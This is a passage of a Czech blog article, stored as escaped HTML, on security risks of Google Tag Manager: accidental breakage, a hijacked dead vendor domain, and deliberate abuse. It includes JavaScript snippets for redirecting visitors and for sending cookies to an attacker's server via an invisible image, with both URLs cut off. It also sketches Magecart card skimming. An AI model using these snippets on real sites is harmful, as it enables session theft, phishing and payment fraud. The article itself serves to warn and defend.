Co to znamen\u00e1?<\/p>\n\n\n\n
Ka\u017ed\u00fd, kdo m\u00e1 pr\u00e1vo publikovat v kontejneru, m\u016f\u017ee na web vlo\u017eit libovoln\u00fd JavaScript. Bez kontroly k\u00f3du. A prohl\u00ed\u017ee\u010d n\u00e1v\u0161t\u011bvn\u00edka ho poslu\u0161n\u011b spust\u00ed.<\/p>\n\n\n\n
Tohle nen\u00ed teoretick\u00e9 riziko. Za svou kari\u00e9ru analytika jsem vid\u011bl lecos \u2014 od rozbit\u00e9ho m\u011b\u0159en\u00ed, nefunk\u010dn\u00edho webu po re\u00e1ln\u00e9 bezpe\u010dnostn\u00ed incidenty. Tenhle \u010dl\u00e1nek ukazuje, co v\u0161echno se m\u016f\u017ee st\u00e1t. A jak tomu p\u0159edej\u00edt.<\/p>\n\n\n\n
Nedbalost \u2014 jak rozb\u00edt web omylem<\/h2>\n\n\n\n
Probl\u00e9my s GTM typicky nevzniknou \u00fatokem. Vzniknou t\u00edm, \u017ee n\u011bkdo p\u0159id\u00e1 tag a neotestuje ho po\u0159\u00e1dn\u011b. Nebo nedomysl\u00ed v\u0161echny mo\u017enosti.<\/p>\n\n\n\n
Takov\u00fdch probl\u00e9m\u016f je n\u011bkolik typ\u016f.<\/p>\n\n\n\n
JavaScript konflikty<\/h3>\n\n\n\n
GTM tagy b\u011b\u017e\u00ed ve stejn\u00e9m kontextu jako zbytek str\u00e1nky. Snadno tak v\u00fdvoj\u00e1\u0159\u016fm m\u016f\u017eete p\u0159epsat jejich vylad\u011bnou str\u00e1nku. Typick\u00e9 probl\u00e9my:<\/p>\n\n\n\n
- \n
- Skript p\u0159ep\u00ed\u0161e glob\u00e1ln\u00ed prom\u011bnnou nebo prototyp, na kter\u00e9m z\u00e1vis\u00ed jin\u00fd k\u00f3d na str\u00e1nce<\/li>\n\n\n\n
- Tag vol\u00e1
stopPropagation()<\/code> nebopreventDefault()<\/code> a zablokuje eventy pro ostatn\u00ed handlery<\/li>\n\n\n\n- T\u011b\u017ek\u00fd skript (heatmapa, session recording) blokuje hlavn\u00ed vl\u00e1kno a str\u00e1nka p\u0159estane reagovat<\/li>\n\n\n\n
- Tag modifikuje DOM elementy, se kter\u00fdmi pracuje framework str\u00e1nky (React, Vue)<\/li>\n<\/ul>\n\n\n\n
Pravidlo: ka\u017ed\u00fd nov\u00fd tag otestujte na re\u00e1ln\u00e9m webu \u2014 ne jen v GTM Preview mode, ale i v kontextu cel\u00e9ho frameworku str\u00e1nky.<\/p>\n\n\n\n
Sta\u010d\u00ed jedna \u0161patn\u011b nastaven\u00e1 podm\u00ednka triggeru a m\u00e1te na webu nekone\u010dnou smy\u010dku.<\/p>\n\n\n\n
<\/div>\n\n\n\nTich\u00e1 ztr\u00e1ta dat<\/h3>\n\n\n\n
Tag p\u0159estane fungovat \u2014 vendor zm\u011bn\u00ed dom\u00e9nu sv\u00e9ho skriptu, skript spadne na chybu, CSP ho zablokuje. Ale proto\u017ee GTM tagy selh\u00e1vaj\u00ed ti\u0161e (\u017e\u00e1dn\u00e9 chybov\u00e9 hl\u00e1\u0161en\u00ed pro u\u017eivatele), nikdo si toho nev\u0161imne. Zjist\u00edte to za t\u00fddny, kdy\u017e se pod\u00edv\u00e1te na data \u2014 a uvid\u00edte d\u00edru, kterou nedopln\u00edte.<\/p>\n\n\n\n
Tohle je z pohledu byznysu nejdra\u017e\u0161\u00ed typ chyby. Rozhodujete na z\u00e1klad\u011b dat, kter\u00e1 neexistuj\u00ed. A ani o tom nev\u00edte.<\/p>\n\n\n\n
<\/div>\n\n\n\nNekone\u010dn\u00e9 cyklen\u00ed<\/h3>\n\n\n\n
P\u0159edstavte si sc\u00e9n\u00e1\u0159: nastav\u00edte tag pro m\u011b\u0159en\u00ed JavaScript chyb. Tag se spust\u00ed p\u0159i chyb\u011b. Jen\u017ee tag s\u00e1m vyvol\u00e1 chybu (t\u0159eba kv\u016fli blokovan\u00e9 dom\u00e9n\u011b). Ta spust\u00ed tag znovu. A znovu. A znovu \u2014 dokud prohl\u00ed\u017ee\u010d nezamrzne nebo nepadne cel\u00e1 z\u00e1lo\u017eka.<\/p>\n\n\n\n
<\/div>\n\n\n\nP\u0159evzet\u00ed mrtv\u00e9 dom\u00e9ny \u2014 p\u0159\u00edb\u011bh z praxe<\/h3>\n\n\n\n
\u0158e\u0161il jsem p\u0159\u00edpad, kdy klient vlo\u017eil do GTM skript od men\u0161\u00ed analytick\u00e9 platformy. Platforma po \u010dase skon\u010dila a pustila svou dom\u00e9nu. N\u011bkdo dom\u00e9nu koupil a za\u010dal z n\u00ed serv\u00edrovat vlastn\u00ed \u0161kodliv\u00e9 skripty.<\/p>\n\n\n\n
V\u00fdsledek: GTM na klientov\u011b webu st\u00e1le na\u010d\u00edtal tag odkazuj\u00edc\u00ed na tu dom\u00e9nu. Prohl\u00ed\u017ee\u010de n\u00e1v\u0161t\u011bvn\u00edk\u016f si st\u00e1hly a spustily k\u00f3d od \u00fato\u010dn\u00edka \u2014 p\u0159es legitimn\u00ed GTM kontejner, na legitimn\u00edm webu.<\/p>\n\n\n\n
Nikdo si toho nev\u0161iml asi m\u011bs\u00edc. Tag byl v kontejneru \u201eodjak\u017eiva“, nikdo nev\u011bd\u011bl, co p\u0159esn\u011b d\u011bl\u00e1, a nikdo nekontroloval, jestli ta platforma je\u0161t\u011b existuje.<\/p>\n\n\n\n
Po m\u011bs\u00edci skript za\u010dal p\u0159esm\u011brov\u00e1vat web na \u00fapln\u011b jinou dom\u00e9nu. A za\u010dala panika.<\/p>\n\n\n\n
Pou\u010den\u00ed:<\/strong> Mrtv\u00e9 tagy v GTM nejsou jen nepo\u0159\u00e1dek. Jsou bezpe\u010dnostn\u00ed riziko. Ka\u017ed\u00fd skript t\u0159et\u00ed strany je z\u00e1vislost \u2014 a z\u00e1vislosti um\u00edraj\u00ed.<\/p>\n\n\n\n
<\/div>\n\n\n\n\u00damysl \u2014 co m\u016f\u017ee ud\u011blat n\u011bkdo s p\u0159\u00edstupem do GTM<\/h2>\n\n\n\n
V\u0161echno v\u00fd\u0161e vzniklo nedbalost\u00ed. Te\u010f se pod\u00edv\u00e1me, co se stane, kdy\u017e n\u011bkdo chce<\/strong> zp\u016fsobit \u0161kodu. Sta\u010d\u00ed mu Publish pr\u00e1vo v GTM kontejneru a Custom HTML tag.<\/p>\n\n\n\n
<\/div>\n\n\n\nP\u0159esm\u011brov\u00e1n\u00ed n\u00e1v\u0161t\u011bvn\u00edk\u016f<\/h3>\n\n\n\n
Nejjednodu\u0161\u0161\u00ed \u00fatok \u2014 jeden \u0159\u00e1dek JavaScriptu:<\/p>\n\n\n\n
window.location.href = 'V\u0161ichni n\u00e1v\u0161t\u011bvn\u00edci webu okam\u017eit\u011b skon\u010d\u00ed na \u00fato\u010dn\u00edkov\u011b str\u00e1nce. Phishing, malware download, cokoliv.<\/p>\n\n\n\n
<\/div>\n\n\n\n\u00daprava obsahu str\u00e1nky<\/h3>\n\n\n\n
\u00dato\u010dn\u00edk m\u016f\u017ee injektovat do str\u00e1nky libovoln\u00fd HTML \u2014 obr\u00e1zky, fale\u0161n\u00e9 formul\u00e1\u0159e, fale\u0161n\u00e9 platebn\u00ed br\u00e1ny. N\u00e1v\u0161t\u011bvn\u00edk nepozn\u00e1 rozd\u00edl, proto\u017ee je po\u0159\u00e1d na legitimn\u00ed dom\u00e9n\u011b.<\/p>\n\n\n\n
<\/div>\n\n\n\nKr\u00e1de\u017e session a cookies<\/h3>\n\n\n\n
var img = document.createElement('img');\nimg.src = 'Neviditeln\u00fd obr\u00e1zek ode\u0161le v\u0161echny cookies na \u00fato\u010dn\u00edk\u016fv server. Pokud mezi nimi je session token, \u00fato\u010dn\u00edk se p\u0159ihl\u00e1s\u00ed jako administr\u00e1tor webu \u2014 bez znalosti hesla.<\/p>\n\n\n\n
<\/div>\n\n\n\nKr\u00e1de\u017ee platebn\u00edch \u00fadaj\u016f (Magecart)<\/h3>\n\n\n\n
Sofistikovan\u011bj\u0161\u00ed varianta: \u00fato\u010dn\u00edk p\u0159es GTM vlo\u017e\u00ed JavaScript, kter\u00fd na checkout str\u00e1nce p\u0159ekryje re\u00e1ln\u00fd platebn\u00ed formul\u00e1\u0159 fale\u0161n\u00fdm. Z\u00e1kazn\u00edk zad\u00e1 \u010d\u00edslo karty \u2014 data jdou \u00fato\u010dn\u00edkovi i legitimn\u00ed platebn\u00ed br\u00e1n\u011b. Z\u00e1kazn\u00edk nic nepozn\u00e1. Obchodn\u00edk nic nepozn\u00e1. Banka to zjist\u00ed za m\u011bs\u00edce.<\/p>\n\n\n\n
<\/div>\n\n\n\nRe\u00e1ln\u00e9 \u00fatoky \u2014 ne teorie, praxe<\/h2>\n\n\n\n
Tohle nejsou hypotetick\u00e9 sc\u00e9n\u00e1\u0159e. Jsou to zdokumentovan\u00e9 p\u0159\u00edpady.<\/p>\n\n\n\n
Magecart na Magento e-shopech (2025)<\/h3>\n\n\n\n
Bezpe\u010dnostn\u00ed firma Sucuri objevila malware<\/a> ukryt\u00fd v GTM kontejneru GTM-MLHK2N68<\/strong> na Magento e-shopech. Payload byl ulo\u017een\u00fd v datab\u00e1zov\u00e9 tabulce
cms_block.content<\/code> \u2014 Base64 enk\u00f3dovan\u00fd JavaScript, kter\u00fd vypadal jako legitimn\u00ed Google Analytics skript.<\/p>\n\n\n\nVe skute\u010dnosti fungoval jako \u0161kodliv\u00fd skript odcizuj\u00edc\u00ed platebn\u00ed \u00fadaje. Zachyt\u00e1val data z checkout formul\u00e1\u0159\u016f a pos\u00edlal je \u00fato\u010dn\u00edk\u016fm.<\/p>\n\n\n\n
![\"\"](\"https:\/\/www.sabatka.net\/wp-content\/uploads\/2026\/04\/null-did-you-know.png\")
<\/figure>\n<\/div>\n\n\n\n